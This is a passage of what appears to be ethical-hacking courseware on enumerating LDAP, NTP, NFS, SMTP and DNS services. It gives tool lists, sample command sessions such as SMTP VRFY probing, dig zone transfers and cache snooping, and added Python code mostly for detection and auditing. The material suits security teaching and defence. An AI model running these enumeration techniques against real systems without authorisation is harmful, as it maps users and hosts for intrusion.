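    return tlv(INTEGER, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def bind_request(msg_id: int, dn: str, password: str, version: int = 3) -> bytes:
    """LDAPMessage { messageID, BindRequest { version, name, simple } }."""
    op = ber_int(version) + tlv(OCTET_STRING, dn.encode()) + tlv(SIMPLE_AUTH, password.encode())
    return tlv(SEQUENCE, ber_int(msg_id) + tlv(BIND_REQUEST, op))


def read_tlv(data: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, first = data[pos], data[pos + 1]
    pos += 2
    if first & 0x80:
        count = first & 0x7F
        length = int.from_bytes(data[pos:pos + count], "big")
        pos += count
    else:
        length = first
    if pos + length > len(data):
        raise ValueError("truncated LDAP message")
    return tag, data[pos:pos + length], pos + length


def classify_bind(packet: bytes) -> dict:
    """Decode a BindRequest and report what a sensor on port 389 would log."""
    tag, msg, _ = read_tlv(packet, 0)
    if tag != SEQUENCE:
        raise ValueError("not an LDAPMessage")
    _, msg_id, pos = read_tlv(msg, 0)
    t, op, _ = read_tlv(msg, pos)
    if t != BIND_REQUEST:
        return {"op": f"0x{t:02x}", "bind": False}
    _, ver, pos = read_tlv(op, 0)
    _, dn, pos = read_tlv(op, pos)
    auth_tag, cred, _ = read_tlv(op, pos)
    kind = "simple" if auth_tag == SIMPLE_AUTH else "sasl"
    # Anonymous bind: empty DN and empty simple credential.
    anonymous = kind == "simple" and not dn and not cred
    return {
        "op": "bind", "bind": True,
        "message_id": int.from_bytes(msg_id, "big", signed=True),
        "version": int.from_bytes(ver, "big", signed=True),
        "dn": dn.decode(), "auth": kind, "anonymous": anonymous,
        # A non-empty simple credential is a cleartext password on the wire
        # unless the session is wrapped in TLS (LDAPS or StartTLS).
        "cleartext_password": kind == "simple" and len(cred) > 0,
    }


if __name__ == "__main__":
    print(bind_request(1, "", "").hex())
    print(classify_bind(bind_request(2, "cn=svc-scan,dc=example,dc=com", "Constructed1!")))
```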
LDAP Enumeration Tools
There are many LDAP enumeration tools that access the directory listings within Active Directory or other directory services. By using these tools, attackers can enumerate information such as valid usernames, addresses, and departmental details from different LDAP servers.
▪ Softerra LDAP Administrator
Source: https://www.ldapadministrator.com
Softerra LDAP Administrator is an LDAP administration tool that works with LDAP servers such as Active Directory, Novell Directory Services, and Netscape/iPlanet. It browses and manages LDAP directories. As shown in the screenshot, attackers use Softerra LDAP Administrator to enumerate user details such as first name, last name, email address, designation, office location, and telephone number.
The following are some additional LDAP enumeration tools:
▪ LDAP Admin Tool (https://www.ldapsoft.com)
▪ LDAP Account Manager (https://www.ldap-account-manager.org)
▪ LDAP Search (https://securityxploded.com)
▪ JXplorer (http://www.jxplorer.org)
▪ Active Directory Explorer (AD Explorer) (https://docs.microsoft.com)
NTP and NFS Enumeration
Administrators often overlook the Network Time Protocol (NTP) server when considering security. However, if queried properly, it can provide valuable network information to an attacker. Therefore, it is necessary to know what information an attacker can obtain about a network through NTP enumeration. The Network File System (NFS) is used for the management of remote file access. NFS enumeration helps attackers to gather information such as a list of clients connected to the NFS server, along with their IP addresses, and exported directories. This section describes NTP enumeration, information extracted via NTP enumeration, various NTP enumeration commands, NTP enumeration tools, and NFS enumeration techniques and tools.
NTP Enumeration
NTP is designed to synchronize clocks of networked computers. It uses UDP port 123 as its primary means of communication. NTP can maintain time within an error of 10 ms over the public Internet. Furthermore, it can achieve an accuracy of 200 µs or better in LANs under ideal conditions.
The following are some pieces of information an attacker can obtain by querying an NTP server:
▪ List of hosts connected to the NTP server
▪ Clients' IP addresses in the network, their system names, and OSs
▪ Internal IPs, if the NTP server is in the demilitarized zone (DMZ)
NTP Enumeration Commands
NTP enumeration commands such as ntpdate, ntptrace, ntpdc, and ntpq are used to query an NTP server for valuable information.
▪ ntpdate
This command collects the number of time samples from several time sources. Its parameters and their respective functions are as follows:
-a key: Enable the authentication function and specify the key identifier to be used for authentication
-B: Force the time to always be slewed
-k keyfile: Specify the path for the authentication key file as the string "keyfile"; the default is /etc/ntp/keys
-o version: Specify the NTP version for outgoing packets as the integer version, which can be 1 or 2; the default is 4
-p samples: Specify the number of samples to be acquired from each server, with values ranging from 1 to 8; the default is 4
-q: Query only; do not set the clock
-s: Divert logging output from the standard output (default) to the system syslog facility
-t timeout: Specify the maximum wait time for a server response; the default is 1 s
-u: Use an unprivileged port for outgoing packets
-v: Be verbose; logs ntpdate's version identification string
Table 4.4: ntpdate parameters and their respective functions
Figure 4.2: Screenshot of the ntpdate command showing debugging information
▪ ntptrace
This command traces the chain of NTP servers for a given host back to the primary source on the network. Example:
# ntptrace
localhost: stratum 4, offset 0.0019529, synchdistance 0.143235
10.10.0.1: stratum 2, offset 0.0114273, synchdistance 0.115554
10.10.1.1: stratum 1, offset 0.0017698, synchdistance 0.011193
▪ ntpdc
This command queries the ntpd daemon about its current state and requests changes in that state. Attackers use this command to retrieve the state and statistics of each NTP server connected to the target network. Its syntax is as follows:
ntpdc [-ilnps] [-c command] [hostname/IP_address]
Its options are as follows:
-c: The following argument is interpreted as an interactive format command; multiple options may be given
-i: Force ntpdc to operate in interactive mode
-l: Obtain a list of peers known to the server(s); this switch is equivalent to -c listpeers
-n: Output all host addresses in the dotted-quad numeric format rather than hostnames
-p: Print a list of the peers as well as a summary of their state
-s: Print a list of the peers as well as a summary of their state, but in a slightly different format
Table 4.6: ntpdc parameters and their respective functions
These queries can be used to obtain additional NTP server information.
Figure 4.13: Screenshot of the ntpdc command
▪ ntpq
This command monitors the operations of the NTP daemon ntpd and determines performance. Its syntax is as follows:
ntpq [-inp] [-c command] [host/IP_address]
Its options are as follows:
-c: The following argument is an interactive format command; multiple options may be given
-d: Debugging mode
-i: Force ntpq to operate in interactive mode
-n: Output all host addresses in the dotted-quad numeric format rather than hostnames
-p: Print a list of the peers known to the server as well as a summary of their state
Example:
ntpq> version
ntpq 4.2.8p10@1.3728-o
ntpq> host
current host is localhost
These ntpq queries can be used to obtain additional NTP server information.
Figure 4.24: Screenshot of ntpq command
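Added example, not from the courseware: ntpq and ntpdc do not use ordinary NTP time packets but mode 6 (control) and mode 7 (private) messages on the same UDP port 123; the following builds all three packet kinds and shows how a defender tells enumeration queries apart from normal client requests. The datagrams are constructed, not captured traffic.

```python
"""Added example (not from the CEH courseware): the layout of the first NTP
byte (LI, version, mode) and how to separate ordinary time requests from the
control (mode 6, ntpq) and private (mode 7, ntpdc) queries used by the
enumeration commands above. All datagrams here are constructed.
"""
import struct
from typing import Dict, List

MODE_NAMES = {1: "symmetric active", 2: "symmetric passive", 3: "client",
              4: "server", 5: "broadcast", 6: "control (ntpq)", 7: "private (ntpdc)"}
MON_GETLIST_1 = 42   # ntpdc 'monlist' request code, widely abused for amplification


def client_request(version: int = 4) -> bytes:
    """A minimal 48-byte mode-3 request like ntpdate/sntp send (LI=0)."""
    first = (0 << 6) | (version << 3) | 3
    return struct.pack("!B", first) + bytes(47)


def control_request(opcode: int = 2, sequence: int = 1, version: int = 2) -> bytes:
    """A 12-byte mode-6 control header, e.g. ntpq's READVAR (opcode 2)."""
    first = (0 << 6) | (version << 3) | 6
    # R|E|M bits + opcode, sequence, status, association id, offset, count
    return struct.pack("!BBHHHHH", first, opcode & 0x1F, sequence, 0, 0, 0, 0)


def private_request(req_code: int = MON_GETLIST_1, version: int = 2) -> bytes:
    """An 8-byte mode-7 private header (implementation 3 = XNTPD)."""
    first = (0 << 6) | (version << 3) | 7
    # R|M|VN|mode, auth|sequence, implementation, request code, err|count, mbz|size
    return struct.pack("!BBBBHH", first, 0, 3, req_code, 0, 0)


def parse_header(pkt: bytes) -> Dict[str, int]:
    """Split LI/version/mode; add stratum for time packets, opcode or request
    code for control and private packets."""
    if not pkt:
        raise ValueError("empty packet")
    first = pkt[0]
    info = {"li": first >> 6, "version": (first >> 3) & 0x7, "mode": first & 0x7}
    if 1 <= info["mode"] <= 5:
        if len(pkt) < 48:
            raise ValueError("short NTP time packet")
        info["stratum"] = pkt[1]
    elif info["mode"] == 6 and len(pkt) >= 12:
        info["opcode"] = pkt[1] & 0x1F
    elif info["mode"] == 7 and len(pkt) >= 8:
        info["request_code"] = pkt[3]
    return info


def flag_enumeration(datagrams: List[bytes]) -> List[str]:
    """One finding per control/private query; mode-3 traffic is normal."""
    findings = []
    for i, pkt in enumerate(datagrams):
        h = parse_header(pkt)
        name = MODE_NAMES.get(h["mode"], "reserved")
        if h["mode"] == 6:
            findings.append(f"datagram {i}: {name} opcode {h['opcode']}")
        elif h["mode"] == 7:
            extra = " (monlist)" if h.get("request_code") == MON_GETLIST_1 else ""
            findings.append(f"datagram {i}: {name} request {h['request_code']}{extra}")
    return findings


if __name__ == "__main__":
    for line in flag_enumeration([client_request(), control_request(), private_request()]):
        print(line)
```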
NTP Enumeration Tools
NTP enumeration tools are used to monitor the working of NTP and SNTP servers in the network and help in the configuration and verification of connectivity from the time client to the NTP servers.
▪ PRTG Network Monitor
Source: https://www.paessler.com
PRTG monitors all systems, devices, traffic, and applications of IT infrastructure by using various technologies such as SNMP, WMI, and SSH. As shown in the screenshot, attackers use PRTG Network Monitor to retrieve SNTP server details such as the response time from the server, active sensors with the server, and synchronization time.
Figure 4.15: Screenshot of PRTG Network Monitor
The following are some NTP enumeration tools:
▪ Nmap (https://nmap.org)
▪ Wireshark (https://www.wireshark.org)
▪ udp-proto-scanner (https://labs.portcullis.co.uk)
▪ NTP Server Scanner (http://www.bytefusion.com)
NFS Enumeration
NFS is a type of file system that enables users to access, view, store, and update files over a remote server. These remote data can be accessed by the client in the same way as data on the local system. Depending on the privileges assigned to the clients, they can either only read or both read and write the data.
An NFS system is generally implemented on a computer network in which the centralization of data is required for critical resources. The remote procedure call (RPC) is used to route and process the request between clients and servers.
To accomplish the task of sharing files and directories over the network, the "exporting" process is used. However, the client first attempts to make the file available for sharing by using the "mounting" process. The /etc/exports location on the NFS server contains a list of clients allowed to share files on the server. In this approach, to access the server, the only credential used is the client's IP address. NFS versions before version 4 run on the same security specification.
Enumerating NFS services enables attackers to identify the exported directories, the list of clients connected to the NFS server along with their IP addresses, and the shared data associated with the IP addresses. After gathering this information, the attackers can spoof their IP addresses to gain full access to the shared files on the server.
As shown in the screenshot, an attacker runs the following NFS enumeration command to scan the target IP address for an open NFS port (port 2049) and the NFS services running on it:
rpcinfo -p 10.10.10.16
Figure 4.16: Screenshot of rpcinfo displaying the open NFS port and services
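Added example (not the courseware's): because /etc/exports and the client IP address are the whole access decision for NFS before version 4, a defender can audit that file for the weaknesses an enumeration of port 2049 would surface; the exports listing below is constructed sample input.

```python
"""Added example (not from the CEH courseware): an audit of /etc/exports, the
file that decides which clients may mount a share. Since the only credential
checked is the client IP address, exports granted to everyone, without
root_squash, or writable under AUTH_SYS are what an attacker who spoofs a
client address benefits from. SAMPLE_EXPORTS is constructed sample input.
"""
import re
from typing import Dict, List

SAMPLE_EXPORTS = """\
# constructed /etc/exports for illustration
/srv/public      *(ro,sync)
/srv/backup      10.10.10.0/24(rw,sync,no_root_squash)
/home            10.10.10.16(rw,sync,root_squash) 10.10.10.17(ro)
/srv/media       *.example.com(rw,insecure)
/srv/secure      10.10.10.5(rw,sec=krb5p)
"""

EXPORT_RE = re.compile(r"^(\S+)\s+(.*)$")
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")


def parse_exports(text: str) -> List[Dict]:
    """Return one record per (path, client) pair with its option set.
    A client with no parentheses gets the exportfs defaults (ro, root_squash)."""
    records = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = EXPORT_RE.match(line)
        if not m:
            continue
        path, rest = m.group(1), m.group(2)
        for cm in CLIENT_RE.finditer(rest):
            client = cm.group(1) or cm.group(3)
            opts = {o.strip() for o in (cm.group(2) or "").split(",") if o.strip()}
            records.append({"path": path, "client": client, "options": opts})
    return records


def audit_exports(text: str) -> List[str]:
    """Flag the weaknesses an NFS enumeration would exploit."""
    findings = []
    for r in parse_exports(text):
        path, client, opts = r["path"], r["client"], r["options"]
        writable = "rw" in opts
        world = client == "*" or client.startswith("*.")
        if world:
            findings.append(f"{path}: exported to {client} ({'rw' if writable else 'ro'})")
        if "no_root_squash" in opts:
            findings.append(f"{path}: no_root_squash for {client} (remote root keeps uid 0)")
        if "insecure" in opts:
            findings.append(f"{path}: insecure for {client} (accepts requests from ports > 1024)")
        # exports(5) defaults to sec=sys: the client-supplied uid/gid is trusted.
        sec = next((o for o in opts if o.startswith("sec=")), "sec=sys")
        if writable and sec == "sec=sys":
            findings.append(f"{path}: rw with AUTH_SYS for {client} (client IP/uid is the only credential)")
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```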
NFS Enumeration Tools
NFS enumeration tools scan a network within a given range of IP addresses or a single IP address to identify the NFS services running on it. These tools also assist in obtaining a list of RPC services using portmap, a list of NFS shares, and a list of directories accessible through NFS; further, they allow downloading a file shared through the NFS server. Attackers use tools such as RPCScan and SuperEnum to perform NFS enumeration.
▪ RPCScan
Source: https://github.com
RPCScan communicates with RPC services and checks misconfigurations on NFS shares.
# python3 rpc-scan.py 10.10.10.19 --rpc
Figure 4.18: Screenshot of RPCScan displaying open NFS ports and services
▪ SuperEnum
Source: https://github.com
SuperEnum includes a script that performs the basic enumeration of any open port. As shown in the screenshot, an attacker uses the script ./superenum and then enters a text file named "Target.txt" having a target IP address or a list of IP addresses for enumeration.
Figure 4.19: Screenshot of SuperEnum running the script
After scanning a target IP address, the script displays all the open ports, as shown in the below screenshot. Port 2049 has an NFS service running.
Figure 4.20: Screenshot of SuperEnum displaying open NFS port
SMTP and DNS Enumeration
This section describes enumeration techniques to extract information related to network resources. It also covers DNS enumeration techniques that yield information about the DNS servers and network infrastructure of the target organization. The section discusses both SMTP and DNS enumeration techniques, covering SMTP enumeration, the process of obtaining a list of valid users on an SMTP server, SMTP enumeration tools, DNS zone transfer, DNS cache snooping, and DNSSEC zone walking.
SMTP Enumeration
Mail systems commonly use SMTP with POP3 and IMAP, which enable users to save messages in the server mailbox and download them from the server when necessary. SMTP uses mail exchange (MX) servers to direct mail via DNS. It runs on TCP port 25, 2525, or 587.
SMTP provides the following three built-in commands.
▪ VRFY: Validates users
$ telnet 192.168.168.1 25
Trying 192.168.168.1...
Connected to 192.168.168.1.
Escape character is '^]'.
220 NYmailserver ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
VRFY Jonathan
250 Super-User <Jonathan@NYmailserver>
VRFY Smith
550 Smith... User unknown
▪ EXPN: Displays the actual delivery addresses of aliases and mailing lists
$ telnet 192.168.168.1 25
Trying 192.168.168.1...
Connected to 192.168.168.1.
Escape character is '^]'.
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
EXPN Jonathan
250 Super-User <Jonathan@NYmailserver>
EXPN Smith
550 Smith... User unknown
▪ RCPT TO: Defines the recipients of the message
$ telnet 192.168.168.1 25
Trying 192.168.168.1...
Connected to 192.168.168.1.
Escape character is '^]'.
220 NYmailserver ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
MAIL FROM:Jonathan
250 Jonathan... Sender ok
RCPT TO:Ryder
250 Ryder... Recipient ok
RCPT TO:Smith
550 Smith... User unknown
SMTP servers respond differently to VRFY, EXPN, and RCPT TO commands for valid and invalid users; therefore, valid users on the SMTP server can be determined. Attackers can directly interact with SMTP via the Telnet prompt and collect a list of valid users on the SMTP server. Administrators and pen testers can perform SMTP enumeration using command-line utilities such as Telnet and netcat or by using tools such as Metasploit, Nmap, NetScanTools Pro, and smtp-user-enum to collect a list of valid users, delivery addresses, message recipients, etc.
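Added example, not from the courseware: a parser for SMTP transcripts like those above that pairs each VRFY, EXPN, and RCPT TO probe with its reply code, separates confirmed from rejected users, and scores a session so that a mail server log can be reviewed for enumeration; the transcript is constructed from the same commands.

```python
"""Added example (not from the CEH courseware): a parser for SMTP session
transcripts like the Telnet sessions above, applied from the defender's side.
It pairs each VRFY/EXPN/RCPT TO command with the server's reply code, shows
the valid/invalid split that makes enumeration possible, and scores a session
for log review. SAMPLE_SESSION is constructed from the page's own commands.
"""
import re
from typing import Dict, List, Tuple

SAMPLE_SESSION = """\
220 NYmailserver ESMTP Sendmail 8.9.3
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
VRFY Jonathan
250 Super-User <Jonathan@NYmailserver>
VRFY Smith
550 Smith... User unknown
EXPN staff
250 Jonathan <Jonathan@NYmailserver>
MAIL FROM:Jonathan
250 Jonathan... Sender ok
RCPT TO:Ryder
250 Ryder... Recipient ok
RCPT TO:Smith
550 Smith... User unknown
RCPT TO:Alice
550 Alice... User unknown
"""

PROBE_RE = re.compile(r"^(VRFY|EXPN|RCPT TO)\s*:?\s*(\S+)", re.IGNORECASE)
REPLY_RE = re.compile(r"^(\d{3})[ -]")


def pair_probes(transcript: str) -> List[Tuple[str, str, int]]:
    """Return (command, argument, reply code) for every user probe."""
    pending = None
    probes = []
    for line in transcript.splitlines():
        m = PROBE_RE.match(line.strip())
        if m:
            pending = (m.group(1).upper(), m.group(2))
            continue
        r = REPLY_RE.match(line)
        if r and pending:
            probes.append((pending[0], pending[1], int(r.group(1))))
            pending = None
    return probes


def enumerated_users(transcript: str) -> Dict[str, List[str]]:
    """Split probed names into confirmed and rejected. 2xx confirms, 550
    rejects; 252 ("cannot VRFY user") is the non-committal reply a hardened
    server gives, so it lands in neither bucket."""
    result: Dict[str, List[str]] = {"valid": [], "invalid": [], "unknown": []}
    for _cmd, name, code in pair_probes(transcript):
        if 200 <= code < 300 and code != 252:
            bucket = "valid"
        elif code == 550:
            bucket = "invalid"
        else:
            bucket = "unknown"
        if name not in result[bucket]:
            result[bucket].append(name)
    return result


def looks_like_enumeration(transcript: str, max_probes: int = 3, max_rejects: int = 2) -> bool:
    """Heuristic for server-side log review: any VRFY/EXPN use, or more RCPT TO
    rejections (or probes) than a mistyped address would explain."""
    probes = pair_probes(transcript)
    if any(cmd in ("VRFY", "EXPN") for cmd, _, _ in probes):
        return True
    rejects = sum(1 for cmd, _, code in probes if cmd == "RCPT TO" and code == 550)
    return rejects >= max_rejects or len(probes) > max_probes


if __name__ == "__main__":
    print(enumerated_users(SAMPLE_SESSION), looks_like_enumeration(SAMPLE_SESSION))
```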
SMTP Enumeration Tools
SMTP enumeration tools are used to perform username enumeration. Attackers can use the usernames obtained from this enumeration to launch further attacks on other systems in the network.
▪ NetScanTools Pro
Source: https://www.netscantools.com
NetScanTools Pro's SMTP Email Generator tool tests the process of sending an email message through an SMTP server. Attackers use NetScanTools Pro for SMTP enumeration and can extract all the email header parameters, including confirm/urgent flags. Attackers also record the email session in a log file and then view the communications between NetScanTools Pro and the SMTP server in the log file.
Figure 4.21: Screenshot of NetScanTools Pro
▪ smtp-user-enum
Source: http://pentestmonkey.net
smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN, and RCPT TO commands. As shown in the screenshot, smtp-user-enum needs to be passed a list of users and at least one target running an SMTP service. The syntax for using smtp-user-enum is as follows:
smtp-user-enum.pl [options] (-u username|-U file-of-usernames) (-t host|-T file-of-targets)
smtp-user-enum has the following options:
-m n: Maximum number of processes (default: 5)
-M mode: Specify the SMTP command to use for username guessing from among EXPN, VRFY, and RCPT TO (default: VRFY)
-u user: Check if a user exists on the remote system
-f addr: Specify the from email address to use for "RCPT TO" guessing (default: user@example.com)
-D dom: Specify the domain to append to the supplied user list to create email addresses (default: none)
-U file: Select the file containing usernames to check via the SMTP service
-t host: Specify the server host running the SMTP service
-T file: Select the file containing hostnames running the SMTP service
-p port: Specify the TCP port on which the SMTP service runs (default: 25)
-d: Debugging output
-t n: Wait for a maximum of n seconds for the reply (default: 5)
-v: Verbose
-h: Help message
Figure 4.22: Screenshot of smtp-user-enum
DNS Enumeration Using Zone Transfer
DNS zone transfer is the process of transferring a copy of the DNS zone file from the primary DNS server to a secondary DNS server. In most cases, the primary DNS server maintains a backup or secondary server for redundancy, which holds all the information stored in the primary server. The DNS server uses zone transfer to distribute changes made to the main server to the secondary server(s).
An attacker performs DNS zone transfer enumeration to locate the DNS server and access records of the target organization. If the DNS server allows zone transfers, then attackers can perform DNS zone transfer to obtain DNS server names, hostnames, machine names, usernames, IP addresses, aliases, etc. assigned within a target domain.
In DNS enumeration using zone transfer, an attacker attempts to retrieve a copy of the entire zone file for a domain from the DNS server. Attackers can perform DNS zone transfer using tools such as nslookup, dig command, and DNSRecon. If the DNS transfer setting is enabled on the target name server, it will provide the DNS information; else, it will return an error stating it has failed or refused the zone transfer.
To perform a DNS zone transfer, the attacker sends a zone-transfer request to the DNS server pretending to be a client; the DNS server then sends a portion of its database as a zone to the attacker. This zone may contain a large amount of information about the zone network.
▪ dig Command
Attackers use the dig command on Linux-based systems to query the DNS name servers and retrieve information about the target host addresses, name servers, mail exchanges, etc. As shown in the screenshot, attackers use the following command to perform DNS zone transfer:
dig ns <target domain>
The above command retrieves all the DNS name servers of the target domain. Next, attackers use one of the name servers from the output of the above command to test whether the target DNS allows zone transfers. They use the following command for this purpose:
dig @<domain of name server> <target domain> axfr
Figure: Screenshot of the dig commands run against certifiedhacker.com, ending with "Transfer failed."
▪ nslookup Command
Source: https://docs.microsoft.com
Attackers use the nslookup command on Windows-based systems to query the DNS name servers and retrieve information about the target host addresses, name servers, mail exchanges, etc. As shown in the screenshot, attackers use the following command to perform DNS zone transfer:
nslookup
set querytype=soa
<target domain>
The above command sets the query type to the Start of Authority (SOA) record to retrieve administrative information about the DNS zone of the target domain certifiedhacker.com. The following command is used to attempt to transfer the zone of the specified name server:
ls -d <domain of name server>
Figure 4.24: Screenshot of Windows DNS zone transfer using the nslookup command
▪ DNSRecon
Source: https://github.com
Attackers use DNSRecon to check all NS records of the target domain for zone transfers. As shown in the screenshot, attackers use the following command for DNS zone transfer:
dnsrecon -t axfr -d <target domain>
In the above command, the -d option specifies the target domain, the -t option specifies the type of enumeration to be performed, and axfr is the type of enumeration in which all NS servers are tested for zone transfer.
DNS Cache Snooping
DNS cache snooping is a type of DNS enumeration technique in which an attacker queries the DNS server for a specific cached DNS record. By using this cached record, the attacker can determine the sites recently visited by the user. This information can further reveal important information such as the name of the owner of the DNS server, its service provider, the name of its vendor, and bank details. By using this information, the attacker can perform a social engineering attack on the target user. Attackers perform DNS cache snooping using various tools such as the dig command, DNS Snoop Dogg, and DNSRecon.
Attackers use the following two DNS cache snooping methods to snoop on a target domain.
▪ Non-recursive Method
In this method, to snoop on a DNS server, attackers send a non-recursive query by setting the Recursion Desired (RD) bit in the query header to zero. Attackers query the DNS cache for a specific DNS record such as A, CNAME, PTR, CERT, SRV, and MX. If the queried record is present in the DNS cache, the DNS server responds with the information indicating that some user on the system has visited a specific domain. Otherwise, the DNS server responds with the information about another DNS server that can return an answer to the query, or it replies with the root .hints file containing information about all root DNS servers.
Attackers use the dig command followed by the name/IP address of the DNS server, domain name, and type of DNS record file. The +norecurse option is used to set the query to non-recursive.
As shown in the screenshot, the status NOERROR implies that the query was accepted but no answer was returned, thereby indicating that no user from the system had visited the queried site.
Figure 4.26: Screenshot of a dig query for a site that is not cached
▪ Recursive Method
In this method, to snoop on the DNS server, attackers send a recursive query by setting the +recurse option instead of the +norecurse option. Similar to the non-recursive method, the attackers query the DNS cache for a specific DNS record such as A, CNAME, PTR, CERT, SRV, and MX. Attackers use the same dig command as in the non-recursive method but with the +recurse option instead of the +norecurse option:
dig @<IP of DNS server> <Target domain> A +recurse
As shown in the screenshot, the TTL value for the domain certifiedhacker.com is considerably low, which strongly suggests that the domain was already in the cache when the query was issued.
Figure 4.27: Screenshot of a dig query for a cached site
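Added example (not the courseware's) that serves both the zone-transfer and the cache-snooping techniques above: it builds the AXFR request (QTYPE 252, sent over TCP with a length prefix) and the RD=0 snooping query, and parses the replies, applying the rule that an answer section means the name was cached while NOERROR with no answer means it was not. All messages are constructed, not live lookups.

```python
"""Added example (not from the CEH courseware) for the two DNS techniques
above: the AXFR request a zone transfer starts with, the non-recursive query
used for cache snooping (RD bit cleared), and a parser for the replies
(REFUSED for a denied transfer; cached vs. not cached for snooping).
All messages here are constructed, not live lookups.
"""
import struct
from typing import Dict, List, Tuple

QTYPE = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "PTR": 12, "MX": 15, "AXFR": 252}
RCODE = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}


def encode_name(name: str) -> bytes:
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".") if l)
    return out + b"\x00"


def build_query(qname: str, qtype: str, rd: bool, msg_id: int = 0x1234) -> bytes:
    """12-byte header + one question. RD=1 is a normal recursive lookup;
    RD=0 is the +norecurse form that only reveals what is already cached."""
    flags = 0x0100 if rd else 0x0000
    header = struct.pack("!HHHHHH", msg_id, flags, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", QTYPE[qtype], 1)


def axfr_query(domain: str) -> bytes:
    """Zone transfer request as sent on TCP 53 (2-byte length prefix)."""
    q = build_query(domain, "AXFR", rd=False)
    return struct.pack("!H", len(q)) + q


def read_name(msg: bytes, pos: int) -> Tuple[str, int]:
    """Decode a name, following compression pointers (0xC0xx)."""
    labels, jumped, end = [], False, pos
    while True:
        n = msg[pos]
        if n & 0xC0 == 0xC0:
            if not jumped:
                end = pos + 2
            pos, jumped = ((n & 0x3F) << 8) | msg[pos + 1], True
            continue
        pos += 1
        if n == 0:
            break
        labels.append(msg[pos:pos + n].decode())
        pos += n
    return ".".join(labels) + ".", (end if jumped else pos)


def parse_message(msg: bytes) -> Dict:
    msg_id, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    pos = 12
    for _ in range(qd):
        _, pos = read_name(msg, pos)
        pos += 4
    answers = []
    for _ in range(an):
        name, pos = read_name(msg, pos)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[pos:pos + 10])
        pos += 10
        answers.append({"name": name, "type": rtype, "ttl": ttl, "rdata": msg[pos:pos + rdlen]})
        pos += rdlen
    return {"id": msg_id, "qr": bool(flags & 0x8000), "rd": bool(flags & 0x0100),
            "ra": bool(flags & 0x0080), "rcode": RCODE.get(flags & 0xF, str(flags & 0xF)),
            "answers": answers}


def classify_snoop(response: bytes) -> str:
    """Apply the cache-snooping rule to the reply to a non-recursive query."""
    m = parse_message(response)
    if m["answers"]:
        return f"cached (min TTL {min(a['ttl'] for a in m['answers'])}s)"
    return "not cached" if m["rcode"] == "NOERROR" else m["rcode"]


def build_response(query: bytes, rcode: int, answers: List[Tuple[int, int, bytes]]) -> bytes:
    """Constructed reply: copies the question; answers are (type, ttl, rdata)
    records whose owner name points back at the question via 0xC00C."""
    msg_id, flags = struct.unpack("!HH", query[:4])
    hdr = struct.pack("!HHHHHH", msg_id, 0x8000 | (flags & 0x0100) | rcode, 1, len(answers), 0, 0)
    body = query[12:]
    for rtype, ttl, rdata in answers:
        body += b"\xC0\x0C" + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata
    return hdr + body
```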
DNSSEC Zone Walking
Domain Name System Security Extensions (DNSSEC) zone walking is a type of DNS enumeration technique in which an attacker attempts to obtain internal records if the DNS zone is not properly configured. The enumerated zone information can assist the attacker in building a host network map.
Organizations use DNSSEC to add security features to the DNS data and provide protection against known threats to the DNS. This security feature uses digital signatures based on public-key cryptography to strengthen authentication in DNS. These digital signatures are stored in the DNS name servers along with common records such as MX, A, AAAA, and CNAME.
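Added example, not from the courseware, showing why an NSEC-signed zone can be walked: each NSEC record names the next owner in canonical order, so following the chain from the apex lists every name without guessing. The zone below is constructed; NSEC3 (hashed owner names) is the usual mitigation.

```python
"""Added example (not from the CEH courseware): walking an NSEC chain. Each
NSEC record carries the next owner name in canonical order and the type
bitmap of its owner, so a walker that follows "next" pointers from the apex
enumerates the whole zone. SAMPLE_NSEC is a constructed zone.
"""
from typing import Dict, List, Tuple

# Constructed NSEC chain: owner -> (next owner, type bitmap), the way
# ldns-walk would receive it one query at a time.
SAMPLE_NSEC: Dict[str, Tuple[str, List[str]]] = {
    "example.com.":          ("_dmarc.example.com.",   ["A", "NS", "SOA", "MX", "RRSIG", "NSEC", "DNSKEY"]),
    "_dmarc.example.com.":   ("api.example.com.",      ["TXT", "RRSIG", "NSEC"]),
    "api.example.com.":      ("intranet.example.com.", ["CNAME", "RRSIG", "NSEC"]),
    "intranet.example.com.": ("vpn.example.com.",      ["A", "AAAA", "RRSIG", "NSEC"]),
    "vpn.example.com.":      ("example.com.",          ["A", "RRSIG", "NSEC"]),
}


def walk_nsec(zone: Dict[str, Tuple[str, List[str]]], apex: str,
              limit: int = 10000) -> List[Tuple[str, List[str]]]:
    """Follow NSEC 'next' pointers from the apex until the chain wraps around.
    Raises if a pointer leaves the chain or the chain never returns to the
    apex (a loop that skips the apex would otherwise walk forever)."""
    names, owner = [], apex
    for _ in range(limit):
        if owner not in zone:
            raise ValueError(f"chain broken at {owner}")
        nxt, types = zone[owner]
        # Report the data types only; RRSIG/NSEC are DNSSEC bookkeeping.
        names.append((owner, [t for t in types if t not in ("RRSIG", "NSEC")]))
        owner = nxt
        if owner == apex:
            return names
    raise ValueError("NSEC chain did not return to the apex")


def host_map(zone: Dict[str, Tuple[str, List[str]]], apex: str) -> List[str]:
    """Names that resolve to hosts (A/AAAA/CNAME): the network map an
    attacker builds, and what a zone owner can check for exposure."""
    return [n for n, types in walk_nsec(zone, apex) if set(types) & {"A", "AAAA", "CNAME"}]


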